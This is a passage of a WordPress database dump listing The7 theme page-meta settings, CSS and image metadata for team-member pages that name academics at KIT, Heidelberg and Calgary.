(16470,2961,'_dt_fancy_header_title_mode','custom'),
(16471,2961,'_dt_fancy_header_title','Martin Weinmann,  KIT,  Germany'),
(16472,2961,'_dt_fancy_header_title_font_size','30'),
(16473,2961,'_dt_fancy_header_title_line_height','36'),
(16474,2961,'_dt_fancy_header_text_transform','none'),
(16475,2961,'_dt_fancy_header_title_color_mode','color'),
(16476,2961,'_dt_fancy_header_title_color','#ffffff'),
(16477,2961,'_dt_fancy_header_subtitle_heading',''),
(16478,2961,'_dt_fancy_header_subtitle',''),
(16479,2961,'_dt_fancy_header_subtitle_font_size','18'),
(16480,2961,'_dt_fancy_header_subtitle_line_height','26'),
(16481,2961,'_dt_fancy_header_subtitle_text_transform','none'),
(16482,2961,'_dt_fancy_header_subtitle_color_mode','color'),
(16483,2961,'_dt_fancy_header_subtitle_color','#ffffff'),
(16484,2961,'_dt_fancy_header_bg_heading',''),
(16485,2961,'_dt_fancy_header_bg_color','#222222'),
(16486,2961,'_dt_fancy_header_bg_image_origin','custom'),
(16487,2961,'_dt_fancy_header_bg_image','a:0:{}'),
(16488,2961,'_dt_fancy_header_bg_repeat','no-repeat'),
(16489,2961,'_dt_fancy_header_bg_position_x','center'),
(16490,2961,'_dt_fancy_header_bg_position_y','center'),
(16491,2961,'_dt_fancy_header_bg_fullscreen','1'),
(16492,2961,'_dt_fancy_header_bg_overlay','0'),
(16493,2961,'_dt_fancy_header_overlay_color','#000'),
(16494,2961,'_dt_fancy_header_bg_overlay_opacity','50'),
(16495,2961,'_dt_fancy_header_scroll_effect','default'),
(16496,2961,'_dt_fancy_header_bg_parallax','0.5'),
(16497,2961,'_dt_fancy_header_responsiveness_heading',''),
(16498,2961,'_dt_fancy_header_responsiveness','enabled'),
(16499,2961,'_dt_fancy_header_responsiveness_switch','778px'),
(16500,2961,'_dt_fancy_header_responsive_height','70'),
(16501,2961,'_dt_fancy_header_responsive_font_size','30'),
(16502,2961,'_dt_fancy_header_responsive_title_line_height','38'),
(16503,2961,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16504,2961,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16505,2961,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16506,2961,'_dt_teammate_options_go_to_single','1'),
(16507,2961,'_dt_teammate_options_position',''),
(16508,2961,'_dt_teammate_options_website',''),
(16509,2961,'_dt_teammate_options_mail',''),
(16510,2961,'_dt_teammate_options_facebook',''),
(16511,2961,'_dt_teammate_options_twitter',''),
(16512,2961,'_dt_teammate_options_dribbble',''),
(16513,2961,'_dt_teammate_options_you-tube',''),
(16514,2961,'_dt_teammate_options_rss',''),
(16515,2961,'_dt_teammate_options_delicious',''),
(16516,2961,'_dt_teammate_options_flickr',''),
(16517,2961,'_dt_teammate_options_lastfm',''),
(16518,2961,'_dt_teammate_options_linkedin',''),
(16519,2961,'_dt_teammate_options_vimeo',''),
(16520,2961,'_dt_teammate_options_tumbler',''),
(16521,2961,'_dt_teammate_options_pinterest',''),
(16522,2961,'_dt_teammate_options_devian',''),
(16523,2961,'_dt_teammate_options_skype',''),
(16524,2961,'_dt_teammate_options_github',''),
(16525,2961,'_dt_teammate_options_instagram',''),
(16526,2961,'_dt_teammate_options_stumbleupon',''),
(16527,2961,'_dt_teammate_options_behance',''),
(16528,2961,'_dt_teammate_options_px-500',''),
(16529,2961,'_dt_teammate_options_tripedvisor',''),
(16530,2961,'_dt_teammate_options_vk',''),
(16531,2961,'_dt_teammate_options_foursquare',''),
(16532,2961,'_dt_teammate_options_xing',''),
(16533,2961,'_dt_teammate_options_weibo',''),
(16534,2961,'_dt_teammate_options_odnoklassniki',''),
(16535,2961,'_dt_teammate_options_research-gate',''),
(16536,2961,'_dt_teammate_options_yelp',''),
(16537,2961,'_dt_teammate_options_blogger',''),
(16538,2961,'_dt_teammate_options_soundcloud',''),
(16539,2961,'_dt_teammate_options_viber',''),
(16540,2961,'_dt_teammate_options_whatsapp',''),
(16541,2961,'_dt_teammate_options_reddit',''),
(16542,2961,'_dt_teammate_options_snapchat',''),
(16543,2961,'_dt_teammate_options_telegram',''),
(16544,2961,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16545,2963,'_edit_lock','1667407504:1'),
(16546,2964,'_wp_attached_file','2022/11/w174.jpg'),
(16547,2964,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:158;s:6:\"height\";i:166;s:4:\"file\";s:16:\"2022/11/w174.jpg\";s:8:\"filesize\";i:10118;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w174-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4937;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16548,2963,'_thumbnail_id','2964'),
(16549,2963,'_edit_last','1'),
(16550,2963,'_dt_sidebar_position','disabled'),
(16551,2963,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16552,2963,'_dt_sidebar_hide_on_mobile','0'),
(16553,2963,'_dt_footer_show','0'),
(16554,2963,'_dt_footer_widgetarea_id','sidebar_2'),
(16555,2963,'_dt_footer_hide_on_mobile','0'),
(16556,2963,'_dt_header_title','fancy'),
(16557,2963,'_dt_header_background','normal'),
(16558,2963,'_dt_header_background_below_slideshow','disabled'),
(16559,2963,'_dt_header_transparent_bg_color_scheme','light'),
(16560,2963,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16561,2963,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16562,2963,'_dt_header_transparent_bg_color','#000000'),
(16563,2963,'_dt_header_transparent_bg_opacity','50'),
(16564,2963,'_dt_header_disabled_background','normal'),
(16565,2963,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16566,2963,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16567,2963,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16568,2963,'_dt_header_disabled_transparent_bg_color','#000000'),
(16569,2963,'_dt_header_disabled_transparent_bg_opacity','50'),
(16570,2963,'_dt_page_overrides_top_margin',''),
(16571,2963,'_dt_page_overrides_right_margin',''),
(16572,2963,'_dt_page_overrides_bottom_margin',''),
(16573,2963,'_dt_page_overrides_left_margin',''),
(16574,2963,'_dt_mobile_page_padding_top',''),
(16575,2963,'_dt_mobile_page_padding_right',''),
(16576,2963,'_dt_mobile_page_padding_bottom',''),
(16577,2963,'_dt_mobile_page_padding_left',''),
(16578,2963,'_dt_fancy_header_layout_heading',''),
(16579,2963,'_dt_fancy_header_title_aligment','center'),
(16580,2963,'_dt_fancy_header_height','300'),
(16581,2963,'_dt_fancy_header_padding-top','0px'),
(16582,2963,'_dt_fancy_header_padding-bottom','0px'),
(16583,2963,'_dt_fancy_header_breadcrumbs_heading',''),
(16584,2963,'_dt_fancy_header_breadcrumbs','disabled'),
(16585,2963,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16586,2963,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16587,2963,'_dt_fancy_header_title_heading',''),
(16588,2963,'_dt_fancy_header_title_mode','custom'),
(16589,2963,'_dt_fancy_header_title','Katarina Anders,  University of Heidelberg, Germany'),
(16590,2963,'_dt_fancy_header_title_font_size','30'),
(16591,2963,'_dt_fancy_header_title_line_height','36'),
(16592,2963,'_dt_fancy_header_text_transform','none'),
(16593,2963,'_dt_fancy_header_title_color_mode','color'),
(16594,2963,'_dt_fancy_header_title_color','#ffffff'),
(16595,2963,'_dt_fancy_header_subtitle_heading',''),
(16596,2963,'_dt_fancy_header_subtitle',''),
(16597,2963,'_dt_fancy_header_subtitle_font_size','18'),
(16598,2963,'_dt_fancy_header_subtitle_line_height','26'),
(16599,2963,'_dt_fancy_header_subtitle_text_transform','none'),
(16600,2963,'_dt_fancy_header_subtitle_color_mode','color'),
(16601,2963,'_dt_fancy_header_subtitle_color','#ffffff'),
(16602,2963,'_dt_fancy_header_bg_heading',''),
(16603,2963,'_dt_fancy_header_bg_color','#222222'),
(16604,2963,'_dt_fancy_header_bg_image_origin','custom'),
(16605,2963,'_dt_fancy_header_bg_image','a:0:{}'),
(16606,2963,'_dt_fancy_header_bg_repeat','no-repeat'),
(16607,2963,'_dt_fancy_header_bg_position_x','center'),
(16608,2963,'_dt_fancy_header_bg_position_y','center'),
(16609,2963,'_dt_fancy_header_bg_fullscreen','1'),
(16610,2963,'_dt_fancy_header_bg_overlay','0'),
(16611,2963,'_dt_fancy_header_overlay_color','#000'),
(16612,2963,'_dt_fancy_header_bg_overlay_opacity','50'),
(16613,2963,'_dt_fancy_header_scroll_effect','default'),
(16614,2963,'_dt_fancy_header_bg_parallax','0.5'),
(16615,2963,'_dt_fancy_header_responsiveness_heading',''),
(16616,2963,'_dt_fancy_header_responsiveness','enabled'),
(16617,2963,'_dt_fancy_header_responsiveness_switch','778px'),
(16618,2963,'_dt_fancy_header_responsive_height','70'),
(16619,2963,'_dt_fancy_header_responsive_font_size','30'),
(16620,2963,'_dt_fancy_header_responsive_title_line_height','38'),
(16621,2963,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16622,2963,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16623,2963,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16624,2963,'_dt_teammate_options_go_to_single','1'),
(16625,2963,'_dt_teammate_options_position',''),
(16626,2963,'_dt_teammate_options_website',''),
(16627,2963,'_dt_teammate_options_mail',''),
(16628,2963,'_dt_teammate_options_facebook',''),
(16629,2963,'_dt_teammate_options_twitter',''),
(16630,2963,'_dt_teammate_options_dribbble',''),
(16631,2963,'_dt_teammate_options_you-tube',''),
(16632,2963,'_dt_teammate_options_rss',''),
(16633,2963,'_dt_teammate_options_delicious',''),
(16634,2963,'_dt_teammate_options_flickr',''),
(16635,2963,'_dt_teammate_options_lastfm',''),
(16636,2963,'_dt_teammate_options_linkedin',''),
(16637,2963,'_dt_teammate_options_vimeo',''),
(16638,2963,'_dt_teammate_options_tumbler',''),
(16639,2963,'_dt_teammate_options_pinterest',''),
(16640,2963,'_dt_teammate_options_devian',''),
(16641,2963,'_dt_teammate_options_skype',''),
(16642,2963,'_dt_teammate_options_github',''),
(16643,2963,'_dt_teammate_options_instagram',''),
(16644,2963,'_dt_teammate_options_stumbleupon',''),
(16645,2963,'_dt_teammate_options_behance',''),
(16646,2963,'_dt_teammate_options_px-500',''),
(16647,2963,'_dt_teammate_options_tripedvisor',''),
(16648,2963,'_dt_teammate_options_vk',''),
(16649,2963,'_dt_teammate_options_foursquare',''),
(16650,2963,'_dt_teammate_options_xing',''),
(16651,2963,'_dt_teammate_options_weibo',''),
(16652,2963,'_dt_teammate_options_odnoklassniki',''),
(16653,2963,'_dt_teammate_options_research-gate',''),
(16654,2963,'_dt_teammate_options_yelp',''),
(16655,2963,'_dt_teammate_options_blogger',''),
(16656,2963,'_dt_teammate_options_soundcloud',''),
(16657,2963,'_dt_teammate_options_viber',''),
(16658,2963,'_dt_teammate_options_whatsapp',''),
(16659,2963,'_dt_teammate_options_reddit',''),
(16660,2963,'_dt_teammate_options_snapchat',''),
(16661,2963,'_dt_teammate_options_telegram',''),
(16662,2963,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16663,2965,'_edit_lock','1667407514:1'),
(16664,2966,'_wp_attached_file','2022/11/w175.jpg'),
(16665,2966,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:165;s:6:\"height\";i:170;s:4:\"file\";s:16:\"2022/11/w175.jpg\";s:8:\"filesize\";i:6953;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w175-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3943;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16666,2965,'_thumbnail_id','2966'),
(16667,2965,'_edit_last','1'),
(16668,2965,'_dt_sidebar_position','disabled'),
(16669,2965,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16670,2965,'_dt_sidebar_hide_on_mobile','0'),
(16671,2965,'_dt_footer_show','0'),
(16672,2965,'_dt_footer_widgetarea_id','sidebar_2'),
(16673,2965,'_dt_footer_hide_on_mobile','0'),
(16674,2965,'_dt_header_title','fancy'),
(16675,2965,'_dt_header_background','normal'),
(16676,2965,'_dt_header_background_below_slideshow','disabled'),
(16677,2965,'_dt_header_transparent_bg_color_scheme','light'),
(16678,2965,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16679,2965,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16680,2965,'_dt_header_transparent_bg_color','#000000'),
(16681,2965,'_dt_header_transparent_bg_opacity','50'),
(16682,2965,'_dt_header_disabled_background','normal'),
(16683,2965,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16684,2965,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16685,2965,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16686,2965,'_dt_header_disabled_transparent_bg_color','#000000'),
(16687,2965,'_dt_header_disabled_transparent_bg_opacity','50'),
(16688,2965,'_dt_page_overrides_top_margin',''),
(16689,2965,'_dt_page_overrides_right_margin',''),
(16690,2965,'_dt_page_overrides_bottom_margin',''),
(16691,2965,'_dt_page_overrides_left_margin',''),
(16692,2965,'_dt_mobile_page_padding_top',''),
(16693,2965,'_dt_mobile_page_padding_right',''),
(16694,2965,'_dt_mobile_page_padding_bottom',''),
(16695,2965,'_dt_mobile_page_padding_left',''),
(16696,2965,'_dt_fancy_header_layout_heading',''),
(16697,2965,'_dt_fancy_header_title_aligment','center'),
(16698,2965,'_dt_fancy_header_height','300'),
(16699,2965,'_dt_fancy_header_padding-top','0px'),
(16700,2965,'_dt_fancy_header_padding-bottom','0px'),
(16701,2965,'_dt_fancy_header_breadcrumbs_heading',''),
(16702,2965,'_dt_fancy_header_breadcrumbs','disabled'),
(16703,2965,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16704,2965,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16705,2965,'_dt_fancy_header_title_heading',''),
(16706,2965,'_dt_fancy_header_title_mode','custom'),
(16707,2965,'_dt_fancy_header_title','Ruisheng Wang,  University of Calgary, Canada'),
(16708,2965,'_dt_fancy_header_title_font_size','30'),
(16709,2965,'_dt_fancy_header_title_line_height','36'),
(16710,2965,'_dt_fancy_header_text_transform','none'),
(16711,2965,'_dt_fancy_header_title_color_mode','color'),
(16712,2965,'_dt_fancy_header_title_color','#ffffff'),
(16713,2965,'_dt_fancy_header_subtitle_heading',''),
(16714,2965,'_dt_fancy_header_subtitle',''),
(16715,2965,'_dt_fancy_header_subtitle_font_size','18'),
(16716,2965,'_dt_fancy_header_subtitle_line_height','26'),
(16717,2965,'_dt_fancy_header_subtitle_text_transform','none'),
(16718,2965,'_dt_fancy_header_subtitle_color_mode','color'),
(16719,2965,'_dt_fancy_header_subtitle_color','#ffffff'),
(16720,2965,'_dt_fancy_header_bg_heading',''),
(16721,2965,'_dt_fancy_header_bg_color','#222222'),
(16722,2965,'_dt_fancy_header_bg_image_origin','custom'),
(16723,2965,'_dt_fancy_header_bg_image','a:0:{}'),
(16724,2965,'_dt_fancy_header_bg_repeat','no-repeat'),
(16725,2965,'_dt_fancy_header_bg_position_x','center'),
(16726,2965,'_dt_fancy_header_bg_position_y','center'),
(16727,2965,'_dt_fancy_header_bg_fullscreen','1'),
(16728,2965,'_dt_fancy_header_bg_overlay','0'),
(16729,2965,'_dt_fancy_header_overlay_color','#000'),
(16730,2965,'_dt_fancy_header_bg_overlay_opacity','50'),
(16731,2965,'_dt_fancy_header_scroll_effect','default'),
(16732,2965,'_dt_fancy_header_bg_parallax','0.5'),
(16733,2965,'_dt_fancy_header_responsiveness_heading',''),
(16734,2965,'_dt_fancy_header_responsiveness','enabled'),
(16735,2965,'_dt_fancy_header_responsiveness_switch','778px'),
(16736,2965,'_dt_fancy_header_responsive_height','70'),
(16737,2965,'_dt_fancy_header_responsive_font_size','30'),
(16738,2965,'_dt_fancy_header_responsive_title_line_height','38'),
(16739,2965,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16740,2965,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16741,2965,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16742,2965,'_dt_teammate_options_go_to_single','1'),
(16743,2965,'_dt_teammate_options_position',''),
(16744,2965,'_dt_teammate_options_website',''),
(16745,2965,'_dt_teammate_options_mail',''),
(16746,2965,'_dt_teammate_options_facebook',''),
(16747,2965,'_dt_teammate_options_twitter',''),
(16748,2965,'_dt_teammate_options_dribbble',''),
(16749,2965,'_dt_teammate_options_you-tube',''),
(16750,2965,'_dt_teammate_options_rss',''),
(16751,2965,'_dt_teammate_options_delicious',''),
(16752,2965,'_dt_teammate_options_flickr',''),
(16753,2965,'_dt_teammate_options_lastfm',''),
(16754,2965,'_dt_teammate_options_linkedin',''),
(16755,2965,'_dt_teammate_options_vimeo',''),
(16756,2965,'_dt_teammate_options_tumbler',''),
(16757,2965,'_dt_teammate_options_pinterest',''),
(16758,2965,'_dt_teammate_options_devian',''),
(16759,2965,'_dt_teammate_options_skype',''),
(16760,2965,'_dt_teammate_options_github',''),
(16761,2965,'_dt_teammate_options_instagram',''),
(16762,2965,'_dt_teammate_options_stumbleupon',''),
(16763,2965,'_dt_teammate_options_behance',''),
(16764,2965,'_dt_teammate_options_px-500',''),
(16765,2965,'_dt_teammate_options_tripedvisor',''),
(16766,2965,'_dt_teammate_options_vk',''),
(16767,2965,'_dt_teammate_options_foursquare',''),
(16768,2965,'_dt_teammate_options_xing',''),
(16769,2965,'_dt_teammate_options_weibo',''),
(16770,2965,'_dt_teammate_options_odnoklassniki',''),
(16771,2965,'_dt_teammate_options_research-gate',''),
(16772,2965,'_dt_teammate_options_yelp',''),
(16773,2965,'_dt_teammate_options_blogger',''),
(16774,2965,'_dt_teammate_options_soundcloud',''),
(16775,2965,'_dt_teammate_options_viber',''),
(16776,2965,'_dt_teammate_options_whatsapp',''),
(16777,2965,'_dt_teammate_options_reddit',''),
(16778,2965,'_dt_teammate_options_snapchat',''),
(16779,2965,'_dt_teammate_options_telegram',''),
(16780,2965,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16781,2959,'rs_page_bg_color',''),
(16782,2961,'rs_page_bg_color',''),
(16783,2963,'rs_page_bg_color',''),
(16784,2965,'rs_page_bg_color',''),
(16785,2972,'_edit_lock','1667594220:1'),
(16786,2973,'_wp_attached_file','2022/11/ws181.jpg'),
(16787,2973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:98;s:6:\"height\";i:126;s:4:\"file\";s:17:\"2022/11/ws181.jpg\";s:8:\"filesize\";i:21828;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(16788,2972,'_thumbnail_id','2973'),
(16789,2972,'_edit_last','1'),
(16790,2972,'_dt_sidebar_position','disabled'),
(16791,2972,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16792,2972,'_dt_sidebar_hide_on_mobile','0'),
(16793,2972,'_dt_footer_show','1'),
(16794,2972,'_dt_footer_widgetarea_id','sidebar_2'),
(16795,2972,'_dt_footer_hide_on_mobile','0'),
(16796,2972,'_dt_header_title','fancy'),
(16797,2972,'_dt_header_background','normal'),
(16798,2972,'_dt_header_background_below_slideshow','disabled'),
(16799,2972,'_dt_header_transparent_bg_color_scheme','light'),
(16800,2972,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16801,2972,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16802,2972,'_dt_header_transparent_bg_color','#000000'),
(16803,2972,'_dt_header_transparent_bg_opacity','50'),
(16804,2972,'_dt_header_disabled_background','normal'),
(16805,2972,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16806,2972,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16807,2972,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16808,2972,'_dt_header_disabled_transparent_bg_color','#000000'),
(16809,2972,'_dt_header_disabled_transparent_bg_opacity','50'),
(16810,2972,'_dt_page_overrides_top_margin',''),
(16811,2972,'_dt_page_overrides_right_margin',''),
(16812,2972,'_dt_page_overrides_bottom_margin',''),
(16813,2972,'_dt_page_overrides_left_margin',''),
(16814,2972,'_dt_mobile_page_padding_top',''),
(16815,2972,'_dt_mobile_page_padding_right',''),
(16816,2972,'_dt_mobile_page_padding_bottom',''),
(16817,2972,'_dt_mobile_page_padding_left',''),
(16818,2972,'_dt_fancy_header_layout_heading',''),
(16819,2972,'_dt_fancy_header_title_aligment','center'),
(16820,2972,'_dt_fancy_header_height','300'),
(16821,2972,'_dt_fancy_header_padding-top','0px'),
(16822,2972,'_dt_fancy_header_padding-bottom','0px'),
(16823,2972,'_dt_fancy_header_breadcrumbs_heading',''),
(16824,2972,'_dt_fancy_header_breadcrumbs','disabled'),
(16825,2972,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16826,2972,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16827,2972,'_dt_fancy_header_title_heading',''),
(16828,2972,'_dt_fancy_header_title_mode','custom'),
(16829,2972,'_dt_fancy_header_title','Emmanuel Stefanakis University of Calgary, CANADA (WG IV/4)'),
(16830,2972,'_dt_fancy_header_title_font_size','30'),
(16831,2972,'_dt_fancy_header_title_line_height','36'),
(16832,2972,'_dt_fancy_header_text_transform','none'),
(16833,2972,'_dt_fancy_header_title_color_mode','color'),
(16834,2972,'_dt_fancy_header_title_color','#ffffff'),
(16835,2972,'_dt_fancy_header_subtitle_heading',''),
(16836,2972,'_dt_fancy_header_subtitle',''),
(16837,2972,'_dt_fancy_header_subtitle_font_size','18'),
(16838,2972,'_dt_fancy_header_subtitle_line_height','26'),
(16839,2972,'_dt_fancy_header_subtitle_text_transform','none'),
(16840,2972,'_dt_fancy_header_subtitle_color_mode','color'),
(16841,2972,'_dt_fancy_header_subtitle_color','#ffffff'),
(16842,2972,'_dt_fancy_header_bg_heading',''),
(16843,2972,'_dt_fancy_header_bg_color','#222222'),
(16844,2972,'_dt_fancy_header_bg_image_origin','custom'),
(16845,2972,'_dt_fancy_header_bg_image','a:0:{}'),
(16846,2972,'_dt_fancy_header_bg_repeat','no-repeat'),
(16847,2972,'_dt_fancy_header_bg_position_x','center'),
(16848,2972,'_dt_fancy_header_bg_position_y','center'),
(16849,2972,'_dt_fancy_header_bg_fullscreen','1'),
(16850,2972,'_dt_fancy_header_bg_overlay','0'),
